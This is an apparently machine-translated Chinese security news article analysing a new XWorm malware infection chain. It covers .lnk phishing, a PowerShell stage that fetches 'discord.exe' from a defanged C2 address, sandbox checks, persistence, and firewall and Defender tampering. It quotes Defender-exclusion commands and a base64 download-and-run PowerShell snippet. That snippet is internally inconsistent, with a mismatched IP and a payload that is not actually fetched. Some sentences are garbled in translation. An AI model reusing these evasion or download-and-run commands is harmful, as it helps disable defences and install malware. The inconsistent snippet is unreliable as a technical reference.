具有新感染链的 XWorm 恶意软件利用用户和系统信任逃避检测

具有新感染链的 XWorm 恶意软件利用用户和系统信任逃避检测

XWorm 后门于 2025 年年中悄然出现,现已发展成为一种看似复杂的威胁,利用用户信心和系统惯例。

当组织注意到伪装成良性文档的基于.lnk的晦涩网络钓鱼电子邮件突然增加时,初步报告浮出水面。

安全团队很快观察到,这些快捷方式触发了隐藏的 PowerShell 例程,而不是打开任何预期的文件,这表明出现了新的感染链。

几天之内,多个行业的企业报告了与陌生 IP 地址的异常网络连接,暗示存在活跃的命令和控制 (C2) 基础设施。

随着活动势头的增强,Trellix 分析师发现与 XWorm 早期的、更可预测的方法有明显不同。

简单的批处理脚本和明显的 VBScript 有效负载已经一去不复返了;相反,攻击者现在部署了一种利用社会工程和技术诡计的多阶段机制。

最初的.lnk文件通常通过有针对性的鱼叉式网络钓鱼传递,在从远程主机静默获取“discord.exe”之前,会丢弃一个看似良性的文本工件。

具有新感染链的 XWorm 恶意软件利用用户和系统信任逃避检测

执行后,此 .基于 NET 的可执行文件解压缩并启动另外两个 components—main.exe 和 system32.exe,后者用作核心 XWorm 有效负载。

一旦system32.exe建立起来,它就会执行严格的环境检查,如果检测到沙箱或虚拟机,则中止。

如果主机被认为是真实的,恶意软件会将自身复制为 Xclient.exe,并通过创建计划任务和注册表运行项来建立持久性。

系统防御被有条不紊地拆除:通过修改 来禁用 Windows 防火墙策略,同时绕过 PowerShell 执行策略以将恶意进程列入白名单。HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall\DisableFirewall

ExecutionPolicy Bypass Add-MpPreference -ExclusionPath "C:\Temp\discord.exe"
ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess "Xclient.exe"

这些命令确保 XWorm 在最少的审查下运行,允许不受限制地访问受感染的环境。

感染机制和部署

XWorm 新链的核心在于其巧妙地使用 base64 编码与 Rijndael 解密相结合,允许有效负载在执行之前保持隐藏状态。

初始.lnk文件嵌入了一个 base64 字符串,该字符串解码为单行 PowerShell 命令。

具有新感染链的 XWorm 恶意软件利用用户和系统信任逃避检测

此命令从 中检索“discord.exe”,并将其保存到 Temp 目录,然后再秘密启动它。hxxp://85[.]203[.]4[.]232:5000/Discord.exe

$payload = "ZG93bmxvYWQgZnJvbSAgaHR0cDovLzg1LjIwMy4zLjIzMjo1MDAwL0Rpc2NvcmQuZXhl"
[IO.File]::WriteAllBytes("$env:TEMP\discord.exe", [Convert]::FromBase64String($payload))
Start-Process "$env:TEMP\discord.exe" -WindowStyle Hidden

激活后,discord.exe滴main.exe和system32.exe,每个滴都装有先进的混淆技术,以阻止静态分析。

Main.exe 的资源部分包含嵌入式 Python 模块,而 system32.exe 实现了早期的 TLS 回调,以便在任何安全钩子干预之前执行关键代码。

具有新感染链的 XWorm 恶意软件利用用户和系统信任逃避检测

这种分层方法不仅使检测变得复杂,而且确保每个组件都强化下一个组件,从而产生一个有弹性、以隐身为中心的感染链,挑战传统的防御策略。

通过这种演变,XWorm 展示了如何融合社会工程、多阶段有效负载交付和复杂的加密隐藏,使对手能够超越现有的检测技术,在目标网络内保持隐蔽性和持久性。

版权声明·<<<---红客联盟--->>>>·免责声明
1. 本版块文章内容及资料部分来源于网络,不代表本站观点,不对其真实性负责,也不构成任何建议。
2. 部分内容由网友自主投稿、编辑整理上传,本站仅提供交流平台,不为该类内容的版权负责。
3. 本版块提供的信息仅作参考,不保证信息的准确性、有效性、及时性和完整性。
4. 若您发现本版块有侵犯您知识产权的内容,请及时与我们联系,我们会尽快修改或删除。
5. 使用者违规、不可抗力(如黑客攻击)或第三方擅自转载引发的争议,联盟不承担责任。
6. 联盟可修订本声明,官网发布即生效,继续使用视为接受新条款。
联系我们:admin@chnhonker.com

给TA打赏
共{{data.count}}人
人已打赏
安全威胁

新的命名空间重用漏洞允许在 Microsoft Azure AI、Google Vertex AI 和 Hugging Face 中远程执行代码

2025-9-4 22:57:59

安全威胁

威胁行为者在新帐户资料设置骗局中攻击 PayPal 用户

2025-9-4 23:04:36

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索